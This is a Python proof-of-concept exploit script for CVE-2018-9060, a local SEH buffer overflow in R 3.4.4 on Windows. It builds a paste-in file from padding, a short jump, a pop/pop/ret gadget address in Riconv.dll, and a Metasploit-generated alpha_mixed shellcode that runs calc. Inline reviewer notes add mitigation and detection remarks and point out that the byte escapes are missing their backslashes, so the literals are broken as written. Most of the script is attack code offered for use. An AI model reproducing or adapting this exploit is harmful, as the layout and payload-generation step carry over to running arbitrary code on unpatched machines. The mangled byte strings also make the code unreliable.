#!/usr/bin/python

#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#


# Output file the PoC steps above tell the user to paste from the clipboard.
filename="r344.txt"

# Padding that reaches the SEH record; the length (900) is what the
# author found for this build, nothing in the script derives it.
junk = "A"*900

# NOTE(review): throughout this listing the `\x` escapes appear without
# their backslashes (e.g. "xebx06xccxcc"), so as written these literals
# are plain ASCII text, not the byte values the comments describe. The
# structure below is still readable as the classic SEH-overwrite layout.

#jump 6
# Next-SEH slot: the comment says a short jump over the handler pointer.
nseh = "xebx06xccxcc"

#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
# Handler slot: per the comment, a pop/pop/ret gadget in Riconv.dll, a module
# shipped with R itself. Mitigation angle: that gadget is only usable
# because the module is mapped without ASLR/SafeSEH-style protections;
# compiling the bundled DLLs with those enabled removes this class of
# overwrite (hedged — the page does not show the module's flags).
seh = "xafx17x3cx64"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "x00x0ax0dx0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
# Payload: per the comment, a Metasploit windows/exec stub encoded with
# x86/alpha_mixed, chosen because of the badchar set listed in the header.
# Detection angle: alpha_mixed output is mostly printable ASCII, so a
# preference string of this length made of printable junk is itself the
# anomaly to alert on, not any particular byte pattern.
calc = ("x89xe1xd9xf7xd9x71xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x59x6cx5ax48x4cx42x77x70x53x30x45x50x35x30x6b"
"x39x58x65x70x31x39x50x30x64x4cx4bx50x50x64x70"
"x6ex6bx71x42x34x4cx4ex6bx71x42x37x64x6ex6bx62"
"x52x56x48x36x6fx4cx77x61x5ax64x66x56x51x49x6f"
"x6ex4cx45x6cx75x31x71x6cx53x32x66x4cx55x70x69"
"x51x38x4fx44x4dx47x71x6ax67x78x62x6ax52x31x42"
"x76x37x4ex6bx70x52x44x50x6ex6bx61x5ax47x4cx6c"
"x4bx30x4cx34x51x71x68x4bx53x63x78x77x71x4bx61"
"x63x61x4ex6bx63x69x35x70x56x61x4ex33x6ex6bx57"
"x39x65x48x68x63x44x7ax37x39x6cx4bx46x54x6cx4b"
"x47x71x7ax76x35x61x49x6fx4cx6cx7ax61x6ax6fx64"
"x4dx55x51x4bx77x57x48x6bx50x74x35x69x66x65x53"
"x31x6dx4ax58x77x4bx61x6dx51x34x61x65x6ax44x61"
"x48x4ex6bx62x78x45x74x47x71x79x43x71x76x4cx4b"
"x64x4cx72x6bx6cx4bx73x68x35x4cx43x31x6ax73x6e"
"x6bx37x74x6ex6bx37x71x4ex30x4fx79x52x64x35x74"
"x55x74x71x4bx51x4bx51x71x70x59x72x7ax53x61x6b"
"x4fx59x70x73x6fx63x6fx72x7ax4cx4bx56x72x48x6b"
"x6ex6dx31x4dx50x6ax55x51x6ex6dx4bx35x4fx42x73"
"x30x65x50x55x50x42x70x72x48x70x31x4ex6bx42x4f"
"x6cx47x6bx4fx4ax75x4dx6bx5ax50x48x35x6ex42x31"
"x46x62x48x39x36x5ax35x6fx4dx6dx4dx4bx4fx79x45"
"x45x6cx63x36x73x4cx45x5ax6bx30x59x6bx79x70x50"
"x75x55x55x6dx6bx43x77x42x33x61x62x62x4fx33x5a"
"x33x30x56x33x49x6fx49x45x43x53x53x51x72x4cx53"
"x53x44x6ex65x35x64x38x43x55x67x70x41x41")

# Trailing padding so the copy is large enough to trigger the fault;
# 8000 is the author's choice, not derived from anything on the page.
fill = "D"*8000

# Final layout: padding | next-SEH | handler | payload | trailing fill.
# Total is 900 + 4 + 4 + 448 + 8000 bytes if the escapes were intact.
buffer = junk + nseh + seh + calc + fill

# Written in text mode ('w'); on Windows that would translate any 0x0a
# byte, which is consistent with 0x0a being in the badchar list above
# (inference — the page does not state this).
# Defender note: the root cause is an unbounded copy of the 'Language for
# menus and messages' preference value (PoC steps in the header); per the
# timeline a new version shipped 04-23-18, so updating past 3.4.4 is the fix.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()